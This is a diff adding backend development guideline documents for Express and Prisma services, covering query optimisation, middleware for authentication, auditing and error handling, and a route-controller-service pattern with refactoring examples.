|
||||||
|
// ❌ Fetches all fields
|
||||||
|
const users = await PrismaService.main.user.findMany();
|
||||||
|
|
||||||
|
// ✅ Only fetch needed fields
|
||||||
|
const users = await PrismaService.main.user.findMany({
|
||||||
|
select: {
|
||||||
|
id: true,
|
||||||
|
email: true,
|
||||||
|
profile: { select: { firstName: true, lastName: true } },
|
||||||
|
},
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
### Use include Carefully
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ❌ Excessive includes
|
||||||
|
const user = await PrismaService.main.user.findUnique({
|
||||||
|
where: { id },
|
||||||
|
include: {
|
||||||
|
profile: true,
|
||||||
|
posts: { include: { comments: true } },
|
||||||
|
workflows: { include: { steps: { include: { actions: true } } } },
|
||||||
|
},
|
||||||
|
});
|
||||||
|
|
||||||
|
// ✅ Only include what you need
|
||||||
|
const user = await PrismaService.main.user.findUnique({
|
||||||
|
where: { id },
|
||||||
|
include: { profile: true },
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## N+1 Query Prevention
|
||||||
|
|
||||||
|
### Problem: N+1 Queries
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ❌ N+1 Query Problem
|
||||||
|
const users = await PrismaService.main.user.findMany(); // 1 query
|
||||||
|
|
||||||
|
for (const user of users) {
|
||||||
|
// N queries (one per user)
|
||||||
|
const profile = await PrismaService.main.userProfile.findUnique({
|
||||||
|
where: { userId: user.id },
|
||||||
|
});
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Solution: Use include or Batching
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ✅ Single query with include
|
||||||
|
const users = await PrismaService.main.user.findMany({
|
||||||
|
include: { profile: true },
|
||||||
|
});
|
||||||
|
|
||||||
|
// ✅ Or batch query
|
||||||
|
const userIds = users.map(u => u.id);
|
||||||
|
const profiles = await PrismaService.main.userProfile.findMany({
|
||||||
|
where: { userId: { in: userIds } },
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Error Handling
|
||||||
|
|
||||||
|
### Prisma Error Types
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import { Prisma } from '@prisma/client';
|
||||||
|
|
||||||
|
try {
|
||||||
|
await PrismaService.main.user.create({ data });
|
||||||
|
} catch (error) {
|
||||||
|
if (error instanceof Prisma.PrismaClientKnownRequestError) {
|
||||||
|
// Unique constraint violation
|
||||||
|
if (error.code === 'P2002') {
|
||||||
|
throw new ConflictError('Email already exists');
|
||||||
|
}
|
||||||
|
|
||||||
|
// Foreign key constraint
|
||||||
|
if (error.code === 'P2003') {
|
||||||
|
throw new ValidationError('Invalid reference');
|
||||||
|
}
|
||||||
|
|
||||||
|
// Record not found
|
||||||
|
if (error.code === 'P2025') {
|
||||||
|
throw new NotFoundError('Record not found');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Unknown error
|
||||||
|
Sentry.captureException(error);
|
||||||
|
throw error;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Related Files:**
|
||||||
|
- [SKILL.md](SKILL.md)
|
||||||
|
- [services-and-repositories.md](services-and-repositories.md)
|
||||||
|
- [async-and-errors.md](async-and-errors.md)
|
||||||
213
skills/backend-dev-guidelines/resources/middleware-guide.md
Normal file
213
skills/backend-dev-guidelines/resources/middleware-guide.md
Normal file
@@ -0,0 +1,213 @@
|
|||||||
|
# Middleware Guide - Express Middleware Patterns
|
||||||
|
|
||||||
|
Complete guide to creating and using middleware in backend microservices.
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [Authentication Middleware](#authentication-middleware)
|
||||||
|
- [Audit Middleware with AsyncLocalStorage](#audit-middleware-with-asynclocalstorage)
|
||||||
|
- [Error Boundary Middleware](#error-boundary-middleware)
|
||||||
|
- [Validation Middleware](#validation-middleware)
|
||||||
|
- [Composable Middleware](#composable-middleware)
|
||||||
|
- [Middleware Ordering](#middleware-ordering)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Authentication Middleware
|
||||||
|
|
||||||
|
### SSOMiddleware Pattern
|
||||||
|
|
||||||
|
**File:** `/form/src/middleware/SSOMiddleware.ts`
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
export class SSOMiddlewareClient {
|
||||||
|
static verifyLoginStatus(req: Request, res: Response, next: NextFunction): void {
|
||||||
|
const token = req.cookies.refresh_token;
|
||||||
|
|
||||||
|
if (!token) {
|
||||||
|
return res.status(401).json({ error: 'Not authenticated' });
|
||||||
|
}
|
||||||
|
|
||||||
|
try {
|
||||||
|
const decoded = jwt.verify(token, config.tokens.jwt);
|
||||||
|
res.locals.claims = decoded;
|
||||||
|
res.locals.effectiveUserId = decoded.sub;
|
||||||
|
next();
|
||||||
|
} catch (error) {
|
||||||
|
res.status(401).json({ error: 'Invalid token' });
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Audit Middleware with AsyncLocalStorage
|
||||||
|
|
||||||
|
### Excellent Pattern from Blog API
|
||||||
|
|
||||||
|
**File:** `/form/src/middleware/auditMiddleware.ts`
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import { AsyncLocalStorage } from 'async_hooks';
|
||||||
|
|
||||||
|
export interface AuditContext {
|
||||||
|
userId: string;
|
||||||
|
userName?: string;
|
||||||
|
impersonatedBy?: string;
|
||||||
|
sessionId?: string;
|
||||||
|
timestamp: Date;
|
||||||
|
requestId: string;
|
||||||
|
}
|
||||||
|
|
||||||
|
export const auditContextStorage = new AsyncLocalStorage<AuditContext>();
|
||||||
|
|
||||||
|
export function auditMiddleware(req: Request, res: Response, next: NextFunction): void {
|
||||||
|
const context: AuditContext = {
|
||||||
|
userId: res.locals.effectiveUserId || 'anonymous',
|
||||||
|
userName: res.locals.claims?.preferred_username,
|
||||||
|
impersonatedBy: res.locals.isImpersonating ? res.locals.originalUserId : undefined,
|
||||||
|
timestamp: new Date(),
|
||||||
|
requestId: req.id || uuidv4(),
|
||||||
|
};
|
||||||
|
|
||||||
|
auditContextStorage.run(context, () => {
|
||||||
|
next();
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
// Getter for current context
|
||||||
|
export function getAuditContext(): AuditContext | null {
|
||||||
|
return auditContextStorage.getStore() || null;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**Benefits:**
|
||||||
|
- Context propagates through entire request
|
||||||
|
- No need to pass context through every function
|
||||||
|
- Automatically available in services, repositories
|
||||||
|
- Type-safe context access
|
||||||
|
|
||||||
|
**Usage in Services:**
|
||||||
|
```typescript
|
||||||
|
import { getAuditContext } from '../middleware/auditMiddleware';
|
||||||
|
|
||||||
|
async function someOperation() {
|
||||||
|
const context = getAuditContext();
|
||||||
|
console.log('Operation by:', context?.userId);
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Error Boundary Middleware
|
||||||
|
|
||||||
|
### Comprehensive Error Handler
|
||||||
|
|
||||||
|
**File:** `/form/src/middleware/errorBoundary.ts`
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
export function errorBoundary(
|
||||||
|
error: Error,
|
||||||
|
req: Request,
|
||||||
|
res: Response,
|
||||||
|
next: NextFunction
|
||||||
|
): void {
|
||||||
|
// Determine status code
|
||||||
|
const statusCode = getStatusCodeForError(error);
|
||||||
|
|
||||||
|
// Capture to Sentry
|
||||||
|
Sentry.withScope((scope) => {
|
||||||
|
scope.setLevel(statusCode >= 500 ? 'error' : 'warning');
|
||||||
|
scope.setTag('error_type', error.name);
|
||||||
|
scope.setContext('error_details', {
|
||||||
|
message: error.message,
|
||||||
|
stack: error.stack,
|
||||||
|
});
|
||||||
|
Sentry.captureException(error);
|
||||||
|
});
|
||||||
|
|
||||||
|
// User-friendly response
|
||||||
|
res.status(statusCode).json({
|
||||||
|
success: false,
|
||||||
|
error: {
|
||||||
|
message: getUserFriendlyMessage(error),
|
||||||
|
code: error.name,
|
||||||
|
},
|
||||||
|
requestId: Sentry.getCurrentScope().getPropagationContext().traceId,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
// Async wrapper
|
||||||
|
export function asyncErrorWrapper(
|
||||||
|
handler: (req: Request, res: Response, next: NextFunction) => Promise<any>
|
||||||
|
) {
|
||||||
|
return async (req: Request, res: Response, next: NextFunction) => {
|
||||||
|
try {
|
||||||
|
await handler(req, res, next);
|
||||||
|
} catch (error) {
|
||||||
|
next(error);
|
||||||
|
}
|
||||||
|
};
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Composable Middleware
|
||||||
|
|
||||||
|
### withAuthAndAudit Pattern
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
export function withAuthAndAudit(...authMiddleware: any[]) {
|
||||||
|
return [
|
||||||
|
...authMiddleware,
|
||||||
|
auditMiddleware,
|
||||||
|
];
|
||||||
|
}
|
||||||
|
|
||||||
|
// Usage
|
||||||
|
router.post('/:formID/submit',
|
||||||
|
...withAuthAndAudit(SSOMiddlewareClient.verifyLoginStatus),
|
||||||
|
async (req, res) => controller.submit(req, res)
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Middleware Ordering
|
||||||
|
|
||||||
|
### Critical Order (Must Follow)
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// 1. Sentry request handler (FIRST)
|
||||||
|
app.use(Sentry.Handlers.requestHandler());
|
||||||
|
|
||||||
|
// 2. Body parsing
|
||||||
|
app.use(express.json());
|
||||||
|
app.use(express.urlencoded({ extended: true }));
|
||||||
|
|
||||||
|
// 3. Cookie parsing
|
||||||
|
app.use(cookieParser());
|
||||||
|
|
||||||
|
// 4. Auth initialization
|
||||||
|
app.use(SSOMiddleware.initialize());
|
||||||
|
|
||||||
|
// 5. Routes registered here
|
||||||
|
app.use('/api/users', userRoutes);
|
||||||
|
|
||||||
|
// 6. Error handler (AFTER routes)
|
||||||
|
app.use(errorBoundary);
|
||||||
|
|
||||||
|
// 7. Sentry error handler (LAST)
|
||||||
|
app.use(Sentry.Handlers.errorHandler());
|
||||||
|
```
|
||||||
|
|
||||||
|
**Rule:** Error handlers MUST be registered AFTER all routes!
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
**Related Files:**
|
||||||
|
- [SKILL.md](SKILL.md)
|
||||||
|
- [routing-and-controllers.md](routing-and-controllers.md)
|
||||||
|
- [async-and-errors.md](async-and-errors.md)
|
||||||
@@ -0,0 +1,756 @@
|
|||||||
|
# Routing and Controllers - Best Practices
|
||||||
|
|
||||||
|
Complete guide to clean route definitions and controller patterns.
|
||||||
|
|
||||||
|
## Table of Contents
|
||||||
|
|
||||||
|
- [Routes: Routing Only](#routes-routing-only)
|
||||||
|
- [BaseController Pattern](#basecontroller-pattern)
|
||||||
|
- [Good Examples](#good-examples)
|
||||||
|
- [Anti-Patterns](#anti-patterns)
|
||||||
|
- [Refactoring Guide](#refactoring-guide)
|
||||||
|
- [Error Handling](#error-handling)
|
||||||
|
- [HTTP Status Codes](#http-status-codes)
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Routes: Routing Only
|
||||||
|
|
||||||
|
### The Golden Rule
|
||||||
|
|
||||||
|
**Routes should ONLY:**
|
||||||
|
- ✅ Define route paths
|
||||||
|
- ✅ Register middleware
|
||||||
|
- ✅ Delegate to controllers
|
||||||
|
|
||||||
|
**Routes should NEVER:**
|
||||||
|
- ❌ Contain business logic
|
||||||
|
- ❌ Access database directly
|
||||||
|
- ❌ Implement validation logic (use Zod + controller)
|
||||||
|
- ❌ Format complex responses
|
||||||
|
- ❌ Handle complex error scenarios
|
||||||
|
|
||||||
|
### Clean Route Pattern
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// routes/userRoutes.ts
|
||||||
|
import { Router } from 'express';
|
||||||
|
import { UserController } from '../controllers/UserController';
|
||||||
|
import { SSOMiddlewareClient } from '../middleware/SSOMiddleware';
|
||||||
|
import { auditMiddleware } from '../middleware/auditMiddleware';
|
||||||
|
|
||||||
|
const router = Router();
|
||||||
|
const controller = new UserController();
|
||||||
|
|
||||||
|
// ✅ CLEAN: Route definition only
|
||||||
|
router.get('/:id',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
auditMiddleware,
|
||||||
|
async (req, res) => controller.getUser(req, res)
|
||||||
|
);
|
||||||
|
|
||||||
|
router.post('/',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
auditMiddleware,
|
||||||
|
async (req, res) => controller.createUser(req, res)
|
||||||
|
);
|
||||||
|
|
||||||
|
router.put('/:id',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
auditMiddleware,
|
||||||
|
async (req, res) => controller.updateUser(req, res)
|
||||||
|
);
|
||||||
|
|
||||||
|
export default router;
|
||||||
|
```
|
||||||
|
|
||||||
|
**Key Points:**
|
||||||
|
- Each route: method, path, middleware chain, controller delegation
|
||||||
|
- No try-catch needed (controller handles errors)
|
||||||
|
- Clean, readable, maintainable
|
||||||
|
- Easy to see all endpoints at a glance
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## BaseController Pattern
|
||||||
|
|
||||||
|
### Why BaseController?
|
||||||
|
|
||||||
|
**Benefits:**
|
||||||
|
- Consistent error handling across all controllers
|
||||||
|
- Automatic Sentry integration
|
||||||
|
- Standardized response formats
|
||||||
|
- Reusable helper methods
|
||||||
|
- Performance tracking utilities
|
||||||
|
- Logging and breadcrumb helpers
|
||||||
|
|
||||||
|
### BaseController Pattern (Template)
|
||||||
|
|
||||||
|
**File:** `/email/src/controllers/BaseController.ts`
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import * as Sentry from '@sentry/node';
|
||||||
|
import { Response } from 'express';
|
||||||
|
|
||||||
|
export abstract class BaseController {
|
||||||
|
/**
|
||||||
|
* Handle errors with Sentry integration
|
||||||
|
*/
|
||||||
|
protected handleError(
|
||||||
|
error: unknown,
|
||||||
|
res: Response,
|
||||||
|
context: string,
|
||||||
|
statusCode = 500
|
||||||
|
): void {
|
||||||
|
Sentry.withScope((scope) => {
|
||||||
|
scope.setTag('controller', this.constructor.name);
|
||||||
|
scope.setTag('operation', context);
|
||||||
|
scope.setUser({ id: res.locals?.claims?.userId });
|
||||||
|
|
||||||
|
if (error instanceof Error) {
|
||||||
|
scope.setContext('error_details', {
|
||||||
|
message: error.message,
|
||||||
|
stack: error.stack,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
Sentry.captureException(error);
|
||||||
|
});
|
||||||
|
|
||||||
|
res.status(statusCode).json({
|
||||||
|
success: false,
|
||||||
|
error: {
|
||||||
|
message: error instanceof Error ? error.message : 'An error occurred',
|
||||||
|
code: statusCode,
|
||||||
|
},
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Handle success responses
|
||||||
|
*/
|
||||||
|
protected handleSuccess<T>(
|
||||||
|
res: Response,
|
||||||
|
data: T,
|
||||||
|
message?: string,
|
||||||
|
statusCode = 200
|
||||||
|
): void {
|
||||||
|
res.status(statusCode).json({
|
||||||
|
success: true,
|
||||||
|
message,
|
||||||
|
data,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Performance tracking wrapper
|
||||||
|
*/
|
||||||
|
protected async withTransaction<T>(
|
||||||
|
name: string,
|
||||||
|
operation: string,
|
||||||
|
callback: () => Promise<T>
|
||||||
|
): Promise<T> {
|
||||||
|
return await Sentry.startSpan(
|
||||||
|
{ name, op: operation },
|
||||||
|
callback
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Validate required fields
|
||||||
|
*/
|
||||||
|
protected validateRequest(
|
||||||
|
required: string[],
|
||||||
|
actual: Record<string, any>,
|
||||||
|
res: Response
|
||||||
|
): boolean {
|
||||||
|
const missing = required.filter((field) => !actual[field]);
|
||||||
|
|
||||||
|
if (missing.length > 0) {
|
||||||
|
Sentry.captureMessage(
|
||||||
|
`Missing required fields: ${missing.join(', ')}`,
|
||||||
|
'warning'
|
||||||
|
);
|
||||||
|
|
||||||
|
res.status(400).json({
|
||||||
|
success: false,
|
||||||
|
error: {
|
||||||
|
message: 'Missing required fields',
|
||||||
|
code: 'VALIDATION_ERROR',
|
||||||
|
details: { missing },
|
||||||
|
},
|
||||||
|
});
|
||||||
|
return false;
|
||||||
|
}
|
||||||
|
return true;
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Logging helpers
|
||||||
|
*/
|
||||||
|
protected logInfo(message: string, context?: Record<string, any>): void {
|
||||||
|
Sentry.addBreadcrumb({
|
||||||
|
category: this.constructor.name,
|
||||||
|
message,
|
||||||
|
level: 'info',
|
||||||
|
data: context,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
protected logWarning(message: string, context?: Record<string, any>): void {
|
||||||
|
Sentry.captureMessage(message, {
|
||||||
|
level: 'warning',
|
||||||
|
tags: { controller: this.constructor.name },
|
||||||
|
extra: context,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Add Sentry breadcrumb
|
||||||
|
*/
|
||||||
|
protected addBreadcrumb(
|
||||||
|
message: string,
|
||||||
|
category: string,
|
||||||
|
data?: Record<string, any>
|
||||||
|
): void {
|
||||||
|
Sentry.addBreadcrumb({ message, category, level: 'info', data });
|
||||||
|
}
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Capture custom metric
|
||||||
|
*/
|
||||||
|
protected captureMetric(name: string, value: number, unit: string): void {
|
||||||
|
Sentry.metrics.gauge(name, value, { unit });
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Using BaseController
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// controllers/UserController.ts
|
||||||
|
import { Request, Response } from 'express';
|
||||||
|
import { BaseController } from './BaseController';
|
||||||
|
import { UserService } from '../services/userService';
|
||||||
|
import { createUserSchema } from '../validators/userSchemas';
|
||||||
|
|
||||||
|
export class UserController extends BaseController {
|
||||||
|
private userService: UserService;
|
||||||
|
|
||||||
|
constructor() {
|
||||||
|
super();
|
||||||
|
this.userService = new UserService();
|
||||||
|
}
|
||||||
|
|
||||||
|
async getUser(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
this.addBreadcrumb('Fetching user', 'user_controller', { userId: req.params.id });
|
||||||
|
|
||||||
|
const user = await this.userService.findById(req.params.id);
|
||||||
|
|
||||||
|
if (!user) {
|
||||||
|
return this.handleError(
|
||||||
|
new Error('User not found'),
|
||||||
|
res,
|
||||||
|
'getUser',
|
||||||
|
404
|
||||||
|
);
|
||||||
|
}
|
||||||
|
|
||||||
|
this.handleSuccess(res, user);
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'getUser');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
async createUser(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
// Validate input
|
||||||
|
const validated = createUserSchema.parse(req.body);
|
||||||
|
|
||||||
|
// Track performance
|
||||||
|
const user = await this.withTransaction(
|
||||||
|
'user.create',
|
||||||
|
'db.query',
|
||||||
|
() => this.userService.create(validated)
|
||||||
|
);
|
||||||
|
|
||||||
|
this.handleSuccess(res, user, 'User created successfully', 201);
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'createUser');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
async updateUser(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
const validated = updateUserSchema.parse(req.body);
|
||||||
|
const user = await this.userService.update(req.params.id, validated);
|
||||||
|
this.handleSuccess(res, user, 'User updated');
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'updateUser');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**Benefits:**
|
||||||
|
- Consistent error handling
|
||||||
|
- Automatic Sentry integration
|
||||||
|
- Performance tracking
|
||||||
|
- Clean, readable code
|
||||||
|
- Easy to test
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Good Examples
|
||||||
|
|
||||||
|
### Example 1: Email Notification Routes (Excellent ✅)
|
||||||
|
|
||||||
|
**File:** `/email/src/routes/notificationRoutes.ts`
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import { Router } from 'express';
|
||||||
|
import { NotificationController } from '../controllers/NotificationController';
|
||||||
|
import { SSOMiddlewareClient } from '../middleware/SSOMiddleware';
|
||||||
|
|
||||||
|
const router = Router();
|
||||||
|
const controller = new NotificationController();
|
||||||
|
|
||||||
|
// ✅ EXCELLENT: Clean delegation
|
||||||
|
router.get('/',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
async (req, res) => controller.getNotifications(req, res)
|
||||||
|
);
|
||||||
|
|
||||||
|
router.post('/',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
async (req, res) => controller.createNotification(req, res)
|
||||||
|
);
|
||||||
|
|
||||||
|
router.put('/:id/read',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
async (req, res) => controller.markAsRead(req, res)
|
||||||
|
);
|
||||||
|
|
||||||
|
export default router;
|
||||||
|
```
|
||||||
|
|
||||||
|
**What Makes This Excellent:**
|
||||||
|
- Zero business logic in routes
|
||||||
|
- Clear middleware chain
|
||||||
|
- Consistent pattern
|
||||||
|
- Easy to understand
|
||||||
|
|
||||||
|
### Example 2: Proxy Routes with Validation (Good ✅)
|
||||||
|
|
||||||
|
**File:** `/form/src/routes/proxyRoutes.ts`
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
import { z } from 'zod';
|
||||||
|
|
||||||
|
const createProxySchema = z.object({
|
||||||
|
originalUserID: z.string().min(1),
|
||||||
|
proxyUserID: z.string().min(1),
|
||||||
|
startsAt: z.string().datetime(),
|
||||||
|
expiresAt: z.string().datetime(),
|
||||||
|
});
|
||||||
|
|
||||||
|
router.post('/',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
async (req, res) => {
|
||||||
|
try {
|
||||||
|
const validated = createProxySchema.parse(req.body);
|
||||||
|
const proxy = await proxyService.createProxyRelationship(validated);
|
||||||
|
res.status(201).json({ success: true, data: proxy });
|
||||||
|
} catch (error) {
|
||||||
|
handler.handleException(res, error);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
**What Makes This Good:**
|
||||||
|
- Zod validation
|
||||||
|
- Delegates to service
|
||||||
|
- Proper HTTP status codes
|
||||||
|
- Error handling
|
||||||
|
|
||||||
|
**Could Be Better:**
|
||||||
|
- Move validation to controller
|
||||||
|
- Use BaseController
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Anti-Patterns
|
||||||
|
|
||||||
|
### Anti-Pattern 1: Business Logic in Routes (Bad ❌)
|
||||||
|
|
||||||
|
**File:** `/form/src/routes/responseRoutes.ts` (actual production code)
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// ❌ ANTI-PATTERN: 200+ lines of business logic in route
|
||||||
|
router.post('/:formID/submit', async (req: Request, res: Response) => {
|
||||||
|
try {
|
||||||
|
const username = res.locals.claims.preferred_username;
|
||||||
|
const responses = req.body.responses;
|
||||||
|
const stepInstanceId = req.body.stepInstanceId;
|
||||||
|
|
||||||
|
// ❌ Permission checking in route
|
||||||
|
const userId = await userProfileService.getProfileByEmail(username).then(p => p.id);
|
||||||
|
const canComplete = await permissionService.canCompleteStep(userId, stepInstanceId);
|
||||||
|
if (!canComplete) {
|
||||||
|
return res.status(403).json({ error: 'No permission' });
|
||||||
|
}
|
||||||
|
|
||||||
|
// ❌ Workflow logic in route
|
||||||
|
const { createWorkflowEngine, CompleteStepCommand } = require('../workflow/core/WorkflowEngineV3');
|
||||||
|
const engine = await createWorkflowEngine();
|
||||||
|
const command = new CompleteStepCommand(
|
||||||
|
stepInstanceId,
|
||||||
|
userId,
|
||||||
|
responses,
|
||||||
|
additionalContext
|
||||||
|
);
|
||||||
|
const events = await engine.executeCommand(command);
|
||||||
|
|
||||||
|
// ❌ Impersonation handling in route
|
||||||
|
if (res.locals.isImpersonating) {
|
||||||
|
impersonationContextStore.storeContext(stepInstanceId, {
|
||||||
|
originalUserId: res.locals.originalUserId,
|
||||||
|
effectiveUserId: userId,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
// ❌ Response processing in route
|
||||||
|
const post = await PrismaService.main.post.findUnique({
|
||||||
|
where: { id: postData.id },
|
||||||
|
include: { comments: true },
|
||||||
|
});
|
||||||
|
|
||||||
|
// ❌ Permission check in route
|
||||||
|
await checkPostPermissions(post, userId);
|
||||||
|
|
||||||
|
// ... 100+ more lines of business logic
|
||||||
|
|
||||||
|
res.json({ success: true, data: result });
|
||||||
|
} catch (e) {
|
||||||
|
handler.handleException(res, e);
|
||||||
|
}
|
||||||
|
});
|
||||||
|
```
|
||||||
|
|
||||||
|
**Why This Is Terrible:**
|
||||||
|
- 200+ lines of business logic
|
||||||
|
- Hard to test (requires HTTP mocking)
|
||||||
|
- Hard to reuse (tied to route)
|
||||||
|
- Mixed responsibilities
|
||||||
|
- Difficult to debug
|
||||||
|
- Performance tracking difficult
|
||||||
|
|
||||||
|
### How to Refactor (Step-by-Step)
|
||||||
|
|
||||||
|
**Step 1: Create Controller**
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// controllers/PostController.ts
|
||||||
|
export class PostController extends BaseController {
|
||||||
|
private postService: PostService;
|
||||||
|
|
||||||
|
constructor() {
|
||||||
|
super();
|
||||||
|
this.postService = new PostService();
|
||||||
|
}
|
||||||
|
|
||||||
|
async createPost(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
const validated = createPostSchema.parse({
|
||||||
|
...req.body,
|
||||||
|
});
|
||||||
|
|
||||||
|
const result = await this.postService.createPost(
|
||||||
|
validated,
|
||||||
|
res.locals.userId
|
||||||
|
);
|
||||||
|
|
||||||
|
this.handleSuccess(res, result, 'Post created successfully');
|
||||||
|
} catch (error) {
|
||||||
|
this.handleError(error, res, 'createPost');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**Step 2: Create Service**
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// services/postService.ts
|
||||||
|
export class PostService {
|
||||||
|
async createPost(
|
||||||
|
data: CreatePostDTO,
|
||||||
|
userId: string
|
||||||
|
): Promise<PostResult> {
|
||||||
|
// Permission check
|
||||||
|
const canCreate = await permissionService.canCreatePost(userId);
|
||||||
|
if (!canCreate) {
|
||||||
|
throw new ForbiddenError('No permission to create post');
|
||||||
|
}
|
||||||
|
|
||||||
|
// Execute workflow
|
||||||
|
const engine = await createWorkflowEngine();
|
||||||
|
const command = new CompleteStepCommand(/* ... */);
|
||||||
|
const events = await engine.executeCommand(command);
|
||||||
|
|
||||||
|
// Handle impersonation if needed
|
||||||
|
if (context.isImpersonating) {
|
||||||
|
await this.handleImpersonation(data.stepInstanceId, context);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Synchronize roles
|
||||||
|
await this.synchronizeRoles(events, userId);
|
||||||
|
|
||||||
|
return { events, success: true };
|
||||||
|
}
|
||||||
|
|
||||||
|
private async handleImpersonation(stepInstanceId: number, context: any) {
|
||||||
|
impersonationContextStore.storeContext(stepInstanceId, {
|
||||||
|
originalUserId: context.originalUserId,
|
||||||
|
effectiveUserId: context.effectiveUserId,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
|
||||||
|
private async synchronizeRoles(events: WorkflowEvent[], userId: string) {
|
||||||
|
// Role synchronization logic
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
**Step 3: Update Route**
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
// routes/postRoutes.ts
|
||||||
|
import { PostController } from '../controllers/PostController';
|
||||||
|
|
||||||
|
const router = Router();
|
||||||
|
const controller = new PostController();
|
||||||
|
|
||||||
|
// ✅ CLEAN: Just routing
|
||||||
|
router.post('/',
|
||||||
|
SSOMiddlewareClient.verifyLoginStatus,
|
||||||
|
auditMiddleware,
|
||||||
|
async (req, res) => controller.createPost(req, res)
|
||||||
|
);
|
||||||
|
```
|
||||||
|
|
||||||
|
**Result:**
|
||||||
|
- Route: 8 lines (was 200+)
|
||||||
|
- Controller: 25 lines (request handling)
|
||||||
|
- Service: 50 lines (business logic)
|
||||||
|
- Testable, reusable, maintainable!
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## Error Handling
|
||||||
|
|
||||||
|
### Controller Error Handling
|
||||||
|
|
||||||
|
```typescript
|
||||||
|
async createUser(req: Request, res: Response): Promise<void> {
|
||||||
|
try {
|
||||||
|
const result = await this.userService.create(req.body);
|
||||||
|
this.handleSuccess(res, result, 'User created', 201);
|
||||||
|
} catch (error) {
|
||||||
|
// BaseController.handleError automatically:
|
||||||
|
// - Captures to Sentry with context
|
||||||
|
// - Sets appropriate status code
|
||||||
|
// - Returns formatted error response
|
||||||
|
this.handleError(error, res, 'createUser');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
